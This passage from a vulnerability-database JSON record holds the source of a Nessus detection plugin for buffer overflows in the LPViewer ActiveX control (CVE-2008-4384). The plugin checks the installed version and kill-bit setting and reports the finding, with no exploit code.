If an\nattacker can trick a user on the affected host into viewing a\nspecially crafted HTML document, he can leverage these issues to\nexecute arbitrary code on the affected system subject to the user's\nprivileges.", "edition": 24, "published": "2008-10-22T00:00:00", "title": "LPViewer ActiveX Control Multiple Buffer Overflow Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-4384"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "LPVIEWER_ACTIVEX_OVERFLOWS.NASL", "href": "https://www.tenable.com/plugins/nessus/34472", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34472);\n script_version(\"1.13\");\n\n script_cve_id(\"CVE-2008-4384\");\n script_bugtraq_id(31604);\n script_xref(name:\"CERT\", value:\"848873\");\n script_xref(name:\"Secunia\", value:\"32140\");\n\n script_name(english:\"LPViewer ActiveX Control Multiple Buffer Overflow Vulnerabilities\");\n script_summary(english:\"Checks for LPViewer control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple remote buffer overflows.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains the LPViewer ActiveX control, initially\ncreated by MGI Software but later taken over by Roxio and then again\nby iseemedia.\n\nThis control reportedly has stack-based buffer overflows in its\n'url()', 'toolbar()', and 'enableZoomPastMax()' methods. 
If an\nattacker can trick a user on the affected host into viewing a\nspecially crafted HTML document, he can leverage these issues to\nexecute arbitrary code on the affected system subject to the user's\nprivileges.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Unknown at this time.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/10/22\");\n script_cvs_date(\"Date: 2018/07/14 1:59:37\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{3F0EECCE-E138-11D1-8712-0060083D83F5}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n ver = activex_get_fileversion(clsid:clsid);\n\n if (ver) ver = string(\"Version \", ver);\n else ver = string(\"An unknown version\");\n\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n ver, \" of the 
vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n}\nactivex_end();\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}